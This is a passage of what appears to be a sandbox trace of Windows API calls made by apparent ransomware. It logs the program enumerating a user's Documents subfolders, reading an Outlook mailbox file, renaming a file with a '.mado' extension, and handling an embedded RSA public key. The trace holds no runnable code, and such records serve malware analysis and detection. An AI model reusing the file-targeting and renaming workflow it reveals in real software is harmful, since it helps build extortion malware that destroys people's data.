Size=0x70) returned 0x3b67690 [0205.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0205.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67690 | out: hHeap=0x2c0000) returned 1 [0205.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.182] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="My Music\\" [0205.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3846b8 [0205.182] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0205.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b81428 [0205.182] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0205.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0205.182] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0205.182] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0205.182] PathFindFileNameW (pszPath="") returned="" [0205.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.182] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca071080, ftCreationTime.dwHighDateTime=0x1d5ddd9, ftLastAccessTime.dwLowDateTime=0x1df3ded0, ftLastAccessTime.dwHighDateTime=0x1d5e181, ftLastWriteTime.dwLowDateTime=0x1df3ded0, ftLastWriteTime.dwHighDateTime=0x1d5e181, nFileSizeHigh=0x0, nFileSizeLow=0x108b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_Kde0C7n4syUZ.ots", cAlternateFileName="_KDE0C~1.OTS")) returned 0xffffffff [0205.183] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0205.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67168 [0205.183] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0205.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.183] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="My Pictures\\" [0205.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3846b8 [0205.183] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0205.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b81428 [0205.183] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0205.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0205.183] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0205.183] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0205.183] PathFindFileNameW (pszPath="") returned="" [0205.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.183] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca071080, ftCreationTime.dwHighDateTime=0x1d5ddd9, ftLastAccessTime.dwLowDateTime=0x1df3ded0, ftLastAccessTime.dwHighDateTime=0x1d5e181, ftLastWriteTime.dwLowDateTime=0x1df3ded0, ftLastWriteTime.dwHighDateTime=0x1d5e181, nFileSizeHigh=0x0, nFileSizeLow=0x108b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_Kde0C7n4syUZ.ots", cAlternateFileName="_KDE0C~1.OTS")) returned 0xffffffff [0205.183] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0205.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67168 [0205.183] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0205.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.183] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="My Shapes\\" [0205.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3846b8 [0205.184] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0205.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b81428 [0205.184] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0205.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0205.184] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0205.184] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0205.184] PathFindFileNameW (pszPath="") returned="" [0205.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.184] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0205.184] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0205.184] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0205.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x3b3348 [0205.184] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini") returned=".ini" [0205.184] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0205.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x3b3348 [0205.184] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss") returned=".vss" [0205.184] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.185] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=0) returned 1 [0205.186] CloseHandle (hObject=0x63c) returned 1 [0205.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0205.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x3b74e80 [0205.186] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss.mado")) returned 1 [0205.186] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0205.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0205.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0205.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.186] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0 [0205.187] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0205.187] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0205.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67168 [0205.187] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0205.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.187] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="My Videos\\" [0205.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3846b8 [0205.187] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0205.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b81428 [0205.187] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0205.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0205.187] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0205.187] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0205.187] PathFindFileNameW (pszPath="") returned="" [0205.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67690 [0205.187] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0xffffffff [0205.187] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0205.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67168 [0205.187] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0205.188] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="Outlook Files\\" [0205.188] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0205.188] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0205.188] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0205.188] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0205.188] PathFindFileNameW (pszPath="") returned="" [0205.188] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0205.188] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0205.188] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0205.188] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned=".pst" [0205.188] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.189] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=271360) returned 1 [0205.189] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.191] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x423da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.191] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.192] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.192] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x25805, lpOverlapped=0x0) returned 1 [0205.195] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.195] lstrlenA (lpString="-----BEGIN PUBLIC 